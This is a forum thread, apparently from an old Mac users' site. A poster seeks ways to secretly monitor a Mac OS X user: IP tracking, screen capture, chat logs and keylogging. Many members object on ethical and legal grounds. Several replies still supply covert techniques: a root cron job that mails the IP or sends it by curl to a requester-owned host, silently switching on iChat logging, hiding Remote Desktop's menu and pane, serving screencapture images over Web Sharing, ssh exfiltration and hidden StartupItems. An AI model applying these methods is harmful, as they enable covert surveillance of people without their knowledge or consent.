[brainchild2b]

I'll be honest. We're trying to remotely target a macos x user to monitor some illegal activities that are taking place through networks associated with us. All ethics aside:

We need to be able to dynamically track his ip, possible solutions are installing a hidden no-ip client through the command line.

We'd also like to somehow be able to at least view his screen on command if not control it.

Any monitoring ideas you have, maybe applescript to email us his new ip? (what email server would this use) he doesn't use mail.app or check mail on this machine outside of a web browser.

Anybody has experience with this? What do you recommend? The important thing is having his ip update to a service like no-ip to be able to "follow" the user.

Are there any keystroke recorders for this?

Also he can't know any of this is installed. While he's not overly paranoid he'd notice the usual signs. Pretty much anything that doesn't show up in applications, login items, or the menubar won't alert him.

Ideas? Experiences? Please share.

[trusted_content]

Do you have physical access to the machine?

If you do, installing a dyndns client would let you track his IP.

As to the other things, I don't know.

And if you intend to set this all up remotely, what you're basically asking for is instructions on attaining remote root on an OS X box. And I doubt anyone's gonna help you there.

[Cipher13]

This is illegal, from what I can gather. What is the exact arrangement?

Networks "associated" with you? You have no business doing this, as far as I can tell, from the limited information you have provided.

You'd pay dearly if you did this to me - so I'd be careful with whatever you do to this guy.

I don't think it's a good idea. Use the normal channels; what kind of "illegal" activities is he partaking in? Why is it your business in the first place? Do you know that it's him?

[brainchild2b]

I have access to the physical machine, I also have access to root. Basically I'm just looking for stuff to help me monitor it remotely.

Anything out there to take screenshots on command invisible to the user?

Also how about an applescript to turn on ichat logs

[brainchild2b]

First of all the reason I posted the "ethics aside" thing at the top was so somebody wouldn't start in on talking about ethics.

Don't change the topic.

1. The machine is property of one of my clients (paying me to monitor a user of his machine)
2. I can monitor my machine if I want
3. We've already consulted a legal team before hand.
4. Don't post in the thread and waste my time, "you'd pay dearly if you did this to me" has nothing to do with the thread.
5. Since you seem to want to make it clear that your elite, and nobody could get away with monitoring your box, share your wealth.

As far as monitoring we have not done too much with OS X monitoring thus far. I'm very familar with monitoring throughout UNIX and windows enviroments. We successfully caught everyone and I've never "paid dearly". Which is aside from the issue. This is something that is done as part of our company. We mostly contract with government offices in the US and Canada to monitor targets or "wanted" persons.

back to the topic..

[Cipher13]

Originally posted by brainchild2b:
First of all the reason I posted the "ethics aside" thing at the top was so somebody wouldn't start in on talking about ethics.

Don't change the topic.

1. It's my computer the user is on
2. I can monitor my machine if I want
3. We've already consulted a legal team before hand.

back to the topic..

Well, putting "ethics aside" isn't really a great option, is it? You could have explained those three points in your original post. I didn't change the topic at all.

Given that, well, why don't you install Timbuktu or VNC on the machine, for remote monitoring? That way you can monitor basically everything taking place.

I'm sure there's a way to take a screenshot via the command line, but I don't know it, unfortunately.

What's the deal with monitoring the IP address? Is this user "borrowing" your system or something, and roaming? Or are they using it in a fixed location? Or what? I'm a little confused as to the situation.

But, eh. You can download a keylogger for OSX, but that's pretty immoral, IMO - your call.

Check out VNC or TB2.

[Cipher13]

Originally posted by brainchild2b:
First of all the reason I posted the "ethics aside" thing at the top was so somebody wouldn't start in on talking about ethics.

Don't change the topic.

1. The machine is property of one of my clients (paying me to monitor a user of his machine)
2. I can monitor my machine if I want
3. We've already consulted a legal team before hand.
4. Don't post in the thread and waste my time, "you'd pay dearly if you did this to me" has nothing to do with the thread.
5. Since you seem to want to make it clear that your elite, and nobody could get away with monitoring your box, share your wealth.

As far as monitoring we have not done too much with OS X monitoring thus far. I'm very familar with monitoring throughout UNIX and windows enviroments. We successfully caught everyone and not had it traced back to us. Which is aside from the issue. This is something that is done as part of our company. We mostly contract with government offices in the US and Canada to monitor targets or "wanted" persons.

back to the topic..

"Edited to add hostility" - so mature, aren't you.

4. Yes, it is relevant; because you want to be careful that the victim of this action doesn't lash back. They might be rather angry about the situation. Something to consider.

5. Where, on earth, did I imply that? Nevermind. It's off-topic. I didn't imply it - if you wanna discuss this further, make it private.

Anyway, what kind of monitoring do you require? Tracking website visits? Conversations? Emails? This all depends greatly on what you want to monitor.

[brainchild2b]

Thanks for the input.

Here is what I'm working with without going into great detail:

*The user is on a Mac OS 10.2 Powerbook

*We have access to the physical machine every so often.

*Keylogging isn't as important, and most of the loggers I've looked at don't seem to be designed very solid.

*We want to monitor the users AOL Instant Messenger chats. The user is on iChat. Logging is turned off.

*We need to have his IP updated to a dynamic DNS service. This must be transparent, no errors, nothing obvious that would tip the user off.

We want to make sure the user doesn't know.

[Cipher13]

Originally posted by brainchild2b:
Thanks for the input.

Here is what I'm working with without going into great detail:

*The user is on a Mac OS 10.2 Powerbook

*We have access to the physical machine every so often.

*Keylogging isn't as important, and most of the loggers I've looked at don't seem to be designed very solid.

*We want to monitor the users AOL Instant Messenger chats. The user is on iChat. Logging is turned off.

*We need to have his IP updated to a dynamic DNS service. This must be transparent, no errors, nothing obvious that would tip the user off.

We want to make sure the user doesn't know.

That could be quite difficult. I just searched through the iChat plists, and it doesn't look like logging can be enabled by writing a default, which would be the nicest, most transparent option (defaults write com.apple.iChat.plist etc etc), but I might have missed it.

I just had a go, and it doesn't look like iChat is scriptable? I thought it was?

Eh, I don't know AppleScript well enough to help there anyway. Sorry. Maybe see if there's a command line client for dyndns to update the IP, as somebody suggested.

[Chuckit]

Originally posted by brainchild2b:
Anything out there to take screenshots on command invisible to the user?

I don't think there's normally a way to do this, but Apple has sample code to take a screenshot on their developer Web site. I'm not sure how you are at programming, but I'd imagine it could be pretty easily adapted to suit your purposes. (I don't recall offhand how the tool works, exactly -- it may not need adapting at all.)

[mmurray]

Originally posted by Cipher13:


I'm sure there's a way to take a screenshot via the command line, but I don't know it, unfortunately.

Go into terminal and type `screencapture'
Courtesy of Mac OS X Hacks.

Michael

[LightWaver-67]

As an "Outside observer" that just viewed this thread for the first time... the original poster of this topic needs to realize that his question appears just as suspect if not MORE than the scenario you are describing.

It's like asking "Hey, how do I break into my own Lexus that has a factory installed security system... I lost my keys"

The knowledge that would be given to you could be used for FAR worse things than checking-up on a client user, so you being a smart person, you MUST be able to see why there might be hesitation to openly discuss it... correct...?

It *might* have been easier to overlook if you STARTED by explaining the problem and letting other power-users tell you the solution... Like:

"I have a client who is worried that one of his users is doing ____________ via AOL on company time, but they have no proof of it. Is there a way that they (we) can monitor his AOL/iChat usage discretely...? Our legal department says we have the right to do so, but I don't even know HOW to do this without causing suspicion..." or something similar.

The difference being... my example wasn't being vague & evasive of why someone would do that... I don't have a solution for you... I'm just a GUI-type user. Sorry, but I just wanted to add my 2-cents to see if I could help you see WHY people responded with slight dis-trust. I'm sure you have to see it too, right...?

Hopefully, you get to stop or catch whatever it is he/she is doing that is upsetting his/her boss. Good luck.

- Scott

[GENERAL_SMILEY]

Not unrelated, but more of a theoretical question for developers - Is it possible to install Remote Desktop, then make it's preference pane invisible, and it's menu bar item (which is annoying anyway) never appear?

That would be your best solution, you could monitor the computer in real time, install further software remotely etc...

[Art Vandelay]

Yes, ARD is the better way to go. I'm pretty sure you can hide its menu item. I know you can observe a machine without the user knowing. You can easily install items remotely with it using packages. You'd be able to take screen shots with it. To hide the pref pane, move it out of the pref panes folder.

[JLL]

I don't know about the US but monitoring people without telling them is illegal in many countries.

[macmike42]

Originally posted by JLL:
I don't know about the US but monitoring people without telling them is illegal in many countries.

It's illegal in the US as well, unless you are Tom Ridge.

BTW, the only way to disable the Remote Desktop menu item is to delete or move it (/System/Library/CoreServices/Menu Extras/RemoteDesktop.menu)

I just renamed mine RemoteDesktop.disabled.menu

[brainchild2b]

See, this is exactly what I didn't want to waste this thread on, a discussion about the "legalities" It's exactly why I worded my post like I did.

Thanks to the user for the terminal screencapture tool. This will work well.

The reason I didn't explain the situation in detail is because it is irrelevent. I need to monitor a person, the more remote access you can help me gain without them knowning is good. Why do you need to know anything else? The important part is a quick way to setup the command line no-ip to keep the ip address up to date.

I usually only have 5 minutes with the machine at a time.

For the last time don't post about the legalities of it. I'm not going to take legal advice from anyone here, that what our legal team gets paid for. I came here for Mac advice.

[Uncle Skeleton]

the reason it's relevant is because you're asking people for help to do something shady. I don't know if you've ever been in contact with people, but I'll tell you right now, they (especially nerds) don't enjoy being in the dark about things. the more mysterious you make it, the more they want to know what you're hiding. If you really wanted to avoid discussing the implications of your request, you would have made up a more believable scenario in the first place than just "all ethics aside"

[brainchild2b]

Well my goal wasn't to lie. Lying causes problems. So if it's a problem asking for advice I can take my OS X questions elsewhere.

I'm working on modifying the noip command line client so that I can insert a CD, run the installer and reboot the machine. Without having to modify the code on that machine.

It's easy enough to write a perl script that doesn't this automatically.

[Zimphire]

*We want to monitor the users AOL Instant Messenger chats. The user is on iChat. Logging is turned off.

I can understand wanting to know if this person is using AIM when he isn't supposed to, but trying to find out what he is saying on there isn't really needed. If it is, I think the reasoning you want to do this is going beyond what you are describing.

BTW you can't start a public thread, and demand people only post what you want them to. Well you can, but don't be surprised if no one listens. Esp when acting shady and suspicious.

[moonmonkey]

Originally posted by brainchild2b:
I'll be honest. We're trying to remotely target a macos x user to monitor some illegal activities that are taking place through networks associated with us. All ethics aside:

We need to be able to dynamically track his ip, possible solutions are installing a hidden no-ip client through the command line.

We'd also like to somehow be able to at least view his screen on command if not control it.

Any monitoring ideas you have, maybe applescript to email us his new ip? (what email server would this use) he doesn't use mail.app or check mail on this machine outside of a web browser.

Anybody has experience with this? What do you recommend? The important thing is having his ip update to a service like no-ip to be able to "follow" the user.

Are there any keystroke recorders for this?

Also he can't know any of this is installed. While he's not overly paranoid he'd notice the usual signs. Pretty much anything that doesn't show up in applications, login items, or the menubar won't alert him.



You obviously are having problems with your wife. If your relationship is not working out, revenge will not make you feel any better, divorce her and move to Thailand.

Ideas? Experiences? Please share.

[Lordie]

Originally posted by brainchild2b:
I'll be honest. We're trying to remotely target a macos x user to monitor some illegal activities that are taking place through networks associated with us.

We need to be able to dynamically track his ip, possible solutions are installing a hidden no-ip client through the command line.

I don't understand. Is the user on a network associated with you? If so, you don't need to track his IP all surreptitiously, all you'd need to do is check whatever is running dhcpd for his lease info. If the user is hopping around, using different static IPs each time, why aren't you just looking for his MAC address on the line?

Is the user logging in to machines on your network, or accessing info hosted on machines therein? If that's the case, you'd be far better off monitoring access from the server, not the client.

You seem particularly interested in AIM chat logs. Aim chat for the most part is unencrypted. If the user is on your network why aren't you just monitoring his network traffic via any number of network monitoring services available to you?

Have you tried just -- get ready for this -- enabling logging on AIM? I mean, really. How many of you would notice if someone turned logging on or off on you? It's not like it flashes a big, green banner saying "OMG! Your computer is logging your conversations!" Set the logdir to ~/Library/Application Support/iChat/Conversations or something similarly innocuous, and I'd bet the user would never notice.

You apparently have experience in "monitoring" in UNIX, and possibly some perl background. If you want his IP badly enough, why not set up a cron job as root? Have it try to ping something every few minutes. If successful, send an email to

Code:
ifconfig |grep 'inet ' | awk '{print $2}' | mail [email protected] -s "My IP addresses"

Better yet, use curl:

Code:

curl --interface en0 -fs --url http://www.somehostyouown.com/foo.php?`sneaky ip getting script goes here` -o /dev/null 

curl --interface en1 -fs --url http://www.somehostyouown.com/foo.php?`sneaky ip getting script goes here` -o /dev/null

I suppose you could leave out the "--interface interface" part. Every few minutes, have the user's machine make those requests. Grep your http error logs for foo.php, and the last one in the list is the most recently active IP. All this no-ip hacking is like using a chainsaw to whittle a toothpick.

But like I said, I don't understand. If the user is doing stuff across networks you own, all this spy vs. spy stuff is needless. If they're not accessing stuff across networks you own, why do you specify that there are illegal activities going on across networks 'associated with you'?

Help us help you. Let's establish what granularity of information you need. VNC, as others have mentioned, will tell you everything, but it comes at a hell of a price. If all you need are chat logs, say so. If you need chat logs and something else, say that.

[Spliffdaddy]

keystroke recorder.

Dump the file onto CD or network when you get that "5 minutes" alone with his (her?) computer.

[LightWaver-67]

I have a question about what to feed Flying Purple Bunnies... Now, I only want to know about the food to give them, don't ask me about the flying purple bunnies themselves... I want you to ONLY talk about their food.

---

Dude... I (we?) get it... we know you want answers of a specific nature... but to go-off and spout "This is all I want you to respond about" is TOTALLY unrealistic and will yield the opposing results. Hence my current reply.

It is ABSOLUTELY relevant for a user to ask about HOW your using the knowledge. It's the same as a physicist explaining to a friend "How to make a small nuclear bomb" on a casual level because the "Friend" wants to know what to look for at his new security job.

Wouldn't he feel like SHITE if the friend went-out and built & detonated a bomb based on his info...?

Again, the point is, the stuff you're asking about makes "SOME" people uncomfortable GIVING that info unless they know EXACTLY how it's used... it's not about YOU or distrusting YOU... it's about feeling like a schmuck if the info I or anyone else gave was used in an improper manner by you or ANYONE ELSE reading this PUBLIC thread.

Your answer(s) will appear here regardless... but you STILL need to realize people's initial hesitations and concerns and not just dismiss them.

As I said before... I hope you find your answers... but take a step back and look at this thread objectively... not from YOUR point of view, but from an outsider's.

We're not wrong for discussing the "legality" of this.

------

Last example: "Please, don't go-on about the morality and legality of child porn... I know it's wrong, but we are doing some research on the subject and would like to know where we could download some".

Would you NOT want to interject something about your doubt...?

Peace...

[Simon]

Originally posted by brainchild2b:
Well my goal wasn't to lie. Lying causes problems. So if it's a problem asking for advice I can take my OS X questions elsewhere.

Yeah. I think you should take them somewhere else because most people here aren't as dumb as you believe.

Do you really think we will let you in on the way to do what you ask for if we think you are probably going to use it in an unfair or even illegal way? I won't.

Either you express openly what the hell you are up to (and I better hope it's a decent thing) or you won't get an answer. It's that simple.

"All ethics aside" is a stupid comment btw. Ethics is all about something that isn't put aside from time to time because you would simply like to for the sake of screwing others.

[Simon]

Originally posted by moonmonkey:
You obviously are having problems with your wife. If your relationship is not working out, revenge will not make you feel any better, divorce her and move to Thailand.

LOL.

Yep. Thailand is a very nice place. And they have great food.

[Arkham_c]

Off-topic posts aside, you can always put in a network sniffer. You can go with something like Etherpeek and put his node on a hub with a computer running the sniffer. Nothing goes in or out without your knowledge.


As far as screenshots, just turn on Web sharing, and use the CLI tool "screencapture" to grab screenshots and put them in /Library/WebServer/Documents/, where you can view them from a web browser.

[goMac]

Where I work we had this issue (worker possibly viewing porn). First, we set up ARD on his machine to monitor him. Then, we set up a web filter.

[Xeo]

Tell your client to monitor the IP on the server end. That's the easiest way. Just use the hardware address which you should already know to log the IP.

I assume you have the root password? Whatever you install should be done as root so it can't be killed by the user.

[brainchild2b]

The issue with going into detail wasn't to hide thing, or purposely create a "shady" profile of myself. The purpose was to protect an ongoing investigation.

I personally use Mac OS X in work I do related to these types of events. The sad thing is (embarassed to admit) I haven't taken the time to properly learn Apple's latest and greated operating system. I'm finding out more and more that I can just use PERL or any of the standard unix tools I'm familar with.

We can enabled iChat logging just fine, I wasn't clear about that. I have remote SSH access to the targets machine as of now. I was just hoping to enabled logging remotely rather than wait a few days before I had direct access. It would also have been nice to turn it on and off. So as to have the ability to keep the user from knowing.

The person is connected to our LAN when in the clients office. They are aware that the office network "could" be monitoried and none of the activities take place then. My client owns a dialup network. When the target leaves the office he takes the laptop and connects to the dialup network via the laptop. Even though we have full access to the dialup network it's still too much trouble to have the network engineers monitor his changing IP. This is when we decided to go with a simple noip or dyndns setup.

We have full rights and have gone through all the channels to monitor this user. We are a contract based company to corporations and government responsible for helping them get the digital evidence on someone. The individual in question will be spending time in jail, we're just being paid to aid the process, and secure evidence.

That's as detailed as I'm going to get. I'm still having trouble getting the no-ip perl scripts working.

I'd like something that I could just drop into the startupitems and have it run the command line no-ip. Just simple drag and drop (i could preconfig the config file) Does anybody have any code like this for Mac OS X already?

Thanks again for your time.

[Lordie]

Recently posted by brainchild2b:
I'd like something that I could just drop into the startupitems and have it run the command line no-ip.

Originally posted by brainchild2b:
Pretty much anything that doesn't show up in applications, login items, or the menubar won't alert him.

Make up your mind.
Any of my suggestions could be enabled or disabled remotely. As for enabling/disabling iChat logging remotely, wouldn't it be as easy as killing iChat, opening up ~/Library/Preferences/com.apple.iChat.plist, changing

Code:
        <key>AutosaveChats</key>
        <false/>

to <true/>? It works for me.

If you insist on continuing your effort to get some no-ip client running as a startup item, you really should make a new thread. The specifics of your original queries have been answered.

[OwlBoy]

Not every thing that it made to load on startup has to go in the login items...

-Owl

[mitchell_pgh]

Ummm, why don't you just monitor his network activity? We do it all the time at the university when we need to make sure people are doing what they should/shouldn't be doing.

If you have physical access to the network, you can basically track EVERYTHING they do via the network.

[mitchell_pgh]

couldn't you just write a shell script that would access an image on your server and also write a shell script for your system that looks for an IP accessing that one image/file (it could check every 10 seconds or so)

It's a dirty way to do it, but it would work...

If the guy is dumb, just install snort on his system...

[gorgonzola]

For something that will initialize on startup, you need to write a StartupItem...see examples in /System/Library/StartupItems and place your custom item in /Library/StartupItems. You can put pretty much anything here. Search Apple for info on how to create StartupItems.

You could use OS X VNC from redstonesoftware for GUI access, because it can be enabled remotely.

I'm very familar with monitoring throughout UNIX and windows enviroments.

Then just use your Unix techniques to do it. They will almost all work.

Incidentally, it is a little rude to request help with security issues while demanding that no one ask any questions about the motives. I'm sure you would appreciate this skepticism if that user came on here and asked how to disable all the spyware on his computer and install a keystroke logger on YOUR computer. Both sides use similar techniques and it's unclear when people ask for tech support which side they're on; when they're this aggressive about not giving out any specifics, it's only natural to be suspicious. People who were suspicious had the best of intentions. I'm giving you the benefit of the doubt and assuming that you're not lying about working for a security firm, but you should really be aware of what outsiders would immediately think before posting a query like this.

[edit: after rereading this thread, I'm increasingly uncomfortable with sharing much security information, so I've removed some of the details of my post. The story seems a little odd, since most surveillance on OS X would be Unix-based, and brainchild2b is supposedly a Unix security expert. Also, if the guy's on your network, the IP tracking should be trivial for your network people (who are presumably assisting). All of the tips I removed are Unix-related, and if you're not lying, then you should know about them anyway, since anyone with intermediate-level knowledge of Unix would think of them easily.]

[Moose]

Originally posted by gorgonzola:

Code:
ls | gzip -9 | ssh [email protected] dd of=ls-output.gz

and that creates a ls-output.gz file with the output of the 'ls' command on the *remote* server without leaving any trace at all on the local machine.

This requires, of course, ssh auth keys to be generated and installed properly.

man 1 ssh-keygen

[gorickey]

This thread has caused me NOT to use iChat at work anymore...

[brainchild2b]

That's another interesting point, does anyone know a unix based keystroke recorder that works well with Mac OS X? I assume there wouldn't be any issues between mac os x gui and the command line, and things would get recorded neatly?

has anybody tried this before?

[gorickey]

Originally posted by brainchild2b:
That's another interesting point, does anyone know a unix based keystroke recorder that works well with Mac OS X? I assume there wouldn't be any issues between mac os x gui and the command line, and things would get recorded neatly?

has anybody tried this before?

Try this link for some information:

http://keystroke-loggers.staticusers.net/mac.shtml

[gorgonzola]

Originally posted by Moose:
This requires, of course, ssh auth keys to be generated and installed properly.

man 1 ssh-keygen

I said that directly before the part you quoted.



Since he's supposedly familiar with Unix more than Mac OS X I assumed he knew something about RSA keys.

[utidjian]

Originally posted by brainchild2b:
I'll be honest.

No! I don't think you are being honest. Your entire series of posts on this topic have the a distinctly unprofessional flavor. While you claim to be doing this as a professional you are asking completely naive questions about basic security and monitoring techniques.

If you are a professional and you and your firm perform these "monitoring" services for the government and industry why are you asking here on a public forum? Your "target" could be reading this same forum.

If, as you claim, you are trying to monitor this persons activity with the blessing of the organization that owns and operates at least part of the network the "target" is using... it is completely trivial to determine their IP address at ALL times. Dialup servers can ALL do this basic logging function by default. Why did you say that "it's still too much trouble to have the network engineers monitor his changing IP"?

If, as you claim, you already have root access then you can monitor all activity on that machine either locally or via the internet. This is also trivial and you can take all the time you like to do it while the "target" is connected to the network(s) you control. Why do you claim that you only have 5 minutes?

If, as you claim, that you need to log ALL instant message, email, and web surfing activity AND the "target" is connected to network(s) you control it is also trivial to collect and log all this activity. Even web based email accessed via SSL does not need to be done "locally" (on the "targets" machine). It will take abit more work to decrypt it though. Why are you trying to install keylogging and monitoring software directly on the "targets" machine?

If, as you claim, that you need to keep all of this completely secret from the "target" then why insist on installing spyware on the "targets" machine when you don't have to? It is also trivial to hide programs and log files from the casual user... especially in Mac OS X. As someone who claims to have experience with Unix you would know this. Why are you asking for ways to hide your activity?

If, as you claim, you have consulted legal counsel on this particular problem... then they would have told you that you can only monitor certain things and only if the machine and/or network belongs to the client firm. Does the machine belong to your client or to the "target"? Why are you trying to monitor activity when it is NOT connected to the client's network(s)?

If, as you claim, you are doing this legally... why are you asking others to set aside their ethics to help you?

If, as you claim, you are being honest (even partially)... I suggest you and/or your firm look for a different line of work because you are not very good at it.

I don't think you are being honest... there are just too many holes in your cover story. I think the only things you have been honest about is that you are trying to spy on someone and that you have set YOUR ethics aside. I think you are a mean, stupid and miserable little person.

Sincerely

[trusted_content]

Originally posted by utidjian:

Now that there is a zinger. Quality work, sir.

[mismith]

"putting all ethics aside..." here is some fuel for the "flame"

Google returns this gem from a version tracker review.
_______________________________________
Anybody who believes� [ Views: 8 ]
Feedback Type: Commentary
Contributed by: brainchild2b Thursday, November 07 2002 @ 09:11 AM PST

Anybody who believes they will get rid of their data with software is just kidding themselves. I can get anything, anything off your harddrive with an electron Gun. Even if it was erased and written over 10 years ago. Don't store supersensitive data on your computer that's what your head is for.
_______________________________________

reference:
http://www.versiontracker.com/dyn/mo...x/16844&page=3

[Zimphire]

Originally posted by mismith:
"putting all ethics aside..." here is some fuel for the "flame"

Google returns this gem from a version tracker review.
_______________________________________
Anybody who believes� [ Views: 8 ]
Feedback Type: Commentary
Contributed by: brainchild2b Thursday, November 07 2002 @ 09:11 AM PST

Anybody who believes they will get rid of their data with software is just kidding themselves. I can get anything, anything off your harddrive with an electron Gun. Even if it was erased and written over 10 years ago. Don't store supersensitive data on your computer that's what your head is for.
_______________________________________

reference:
http://www.versiontracker.com/dyn/mo...x/16844&page=3

Of course that could be anyone. But then again the (2b) is pretty abnormal.

What a tool.

[EnVoy]

So, the next logical question. How does one using OSX know/findout if the above mentioned methods are being used against him/herself?

[gorgonzola]

Originally posted by EnVoy:
So, the next logical question. How does one using OSX know/findout if the above mentioned methods are being used against him/herself?

Little Snitch from Objective Development will notify you of any outgoing connection your computer is trying to make so you can allow/deny it. That would notify you if sendmail is trying to send something out and then you would become suspicious because you don't run sendmail. It's $25 software though.

Also, you firewall everything you're not using, so unauthorized servers on your machine wouldn't really work. Then you have to go through network traffic (maybe with something like ntop), log firewall activity, stuff like that.

[Angus_D]

Or you just make sure nobody else has the root password to your box.

[gorgonzola]

Originally posted by Angus_D:
Or you just make sure nobody else has the root password to your box.

True, but if anyone has physical access to the box without root, they could easily reset the root password to something. You're right though.

[brainchild2b]

I posted here because I'm not concerned about the user reading these forums. It needed help with OS X enough that I posted at a public forum.

[talisker]

Originally posted by brainchild2b:
I posted here because I'm not concerned about the user reading these forums. It needed help with OS X enough that I posted at a public forum.

So let's get this straight - you work for a professional consultancy firm helping a company to investigate an employee. As such your company will presumably be making some money. And you come here expecting people to give you free advice to without demanding some of the profit? And they give it to you? Wow.

The most professional thing would be to tell everyone the name of your company and put this on a more above board commercial business. I can't possibly see how that could compromise your position in any way.